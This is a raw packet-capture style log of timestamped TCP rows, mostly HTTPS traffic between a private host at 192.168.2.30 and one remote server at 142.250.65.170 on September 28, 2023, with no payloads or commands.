Sep 28, 2023 14:35:41.168637991 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.168757915 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.168817997 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.175692081 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.175806046 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.175865889 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.180605888 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.180857897 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.185224056 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.185296059 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.189465046 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.189552069 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.193648100 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.197834015 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.197865963 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.201673031 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.201709032 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.205533981 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.205569983 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.205729961 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.205806017 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.209036112 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.209450960 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.213448048 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.213644981 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.213706017 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.216983080 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.217061043 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.217159033 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.217221022 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.217297077 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.219085932 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.221512079 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.221714020 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.221775055 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.222765923 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.224734068 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.224803925 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.226883888 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.226960897 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.228977919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.231430054 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.231703997 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.233455896 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.233534098 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.236126900 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.236388922 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.237821102 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.237896919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.240055084 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.242280006 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.242351055 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.244775057 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.246640921 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.247055054 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.247168064 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.247239113 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.248815060 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.250009060 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.250648022 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.250737906 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.252161026 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.254853964 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.254931927 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.254993916 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.255280018 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.255371094 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.256658077 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.256721973 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.256742001 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.258832932 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.258897066 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.258913040 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.261104107 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.261163950 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.261178970 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.263206005 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.263277054 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.263278008 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.263339996 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.264313936 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.265379906 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.267580986 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.267725945 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.270009041 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.270081043 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.272255898 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.272327900 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.274209023 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.276535988 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.277435064 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.277507067 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.277885914 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.277956009 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.280178070 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.280278921 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.280338049 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.281832933 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.283899069 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.283970118 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.286078930 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.286144018 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.288408995 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.290186882 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.292294025 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.295953989 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.296026945 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.299752951 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.300096989 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.300129890 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.300750017 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.303714991 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.303774118 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.304301977 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.306963921 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.307023048 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.307326078 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.309068918 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.309091091 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.309756994 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.347858906 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.347891092 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.348341942 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.350446939 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.350461006 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.351104975 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.355101109 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.355115891 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.374455929 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.392110109 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.393685102 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.393729925 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.394112110 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.395054102 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.395076990 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.395482063 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.398122072 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.398154974 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.398907900 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.399801970 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.399815083 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.400023937 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.439024925 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.439075947 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.439110041 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.443130970 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.444389105 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.444443941 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.445139885 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.447041035 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.447074890 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.447674036 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.461829901 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.461888075 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.478457928 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.478460073 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.478537083 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.493278027 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.493336916 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.493544102 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.512058020 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.512115955 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.517524958 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.522960901 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.523020029 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.523526907 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.538512945 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.538564920 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.538600922 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.562450886 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.569657087 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.587923050 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.587980986 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.588768959 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.598790884 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.598849058 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.599287033 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.614846945 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.614906073 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.615430117 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.647697926 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.647754908 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.648180008 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.652570963 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.652627945 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.653299093 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.654774904 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.654808998 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.655462027 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.657546043 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.657557011 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.657577991 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.658186913 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.660454035 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.660465002 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.661099911 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.700710058 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.700778008 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.701210022 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.702466011 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.702497959 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.702925920 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.704871893 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.704888105 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.705374956 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.706468105 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.706491947 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.706949949 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.741384983 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.741442919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.741919994 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.743944883 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.743972063 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.744858027 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.746428967 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.746459007 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.747243881 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.749984980 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.750040054 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.750793934 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.753407955 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.753451109 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.766483068 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.772135019 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.773699045 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.773726940 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.774318933 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.776427031 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.776442051 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.777123928 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.778517962 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.778528929 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.779208899 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.780723095 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.780740023 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.781358957 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.783505917 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.783516884 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.783538103 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.797319889 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.809489012 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.809546947 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.810297966 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.814158916 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.814232111 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.821432114 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:41.830554008 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.833708048 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.842308044 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.842365026 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.843072891 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.874301910 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.874357939 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.894526958 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.903748035 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.959280968 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.959338903 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.959999084 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.961496115 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.961508989 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.961532116 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.962270975 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.964804888 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.964817047 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.965596914 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.966988087 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.967020035 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.990490913 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.007519960 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.010982990 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.011039972 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.011318922 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.025860071 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.025916100 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.026022911 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.075170994 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.075197935 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.075261116 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.088938951 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.088973999 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.114459991 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.129539967 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.148926020 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.148983002 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.150131941 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.252123117 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.252182961 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.253433943 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.255548000 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.255583048 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.256506920 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.330099106 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.330157042 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.330758095 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.370852947 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.370908976 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.371440887 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.375200987 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.375240088 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.375739098 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.375760078 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.376384974 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.377687931 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.377713919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.378259897 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.419661045 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.419718027 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.420434952 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.422617912 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.422630072 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.423274994 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.425477028 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.425487041 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.442490101 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.463102102 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.466408968 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.466424942 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.467163086 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.469130993 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.469152927 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.469928980 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.469945908 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.470108032 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.509875059 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.509938955 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.510895967 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.516000032 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.516025066 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.516891956 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.560388088 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.560444117 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.561256886 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.576777935 CEST	32896	443	192.168.2.30	142.250.65.170
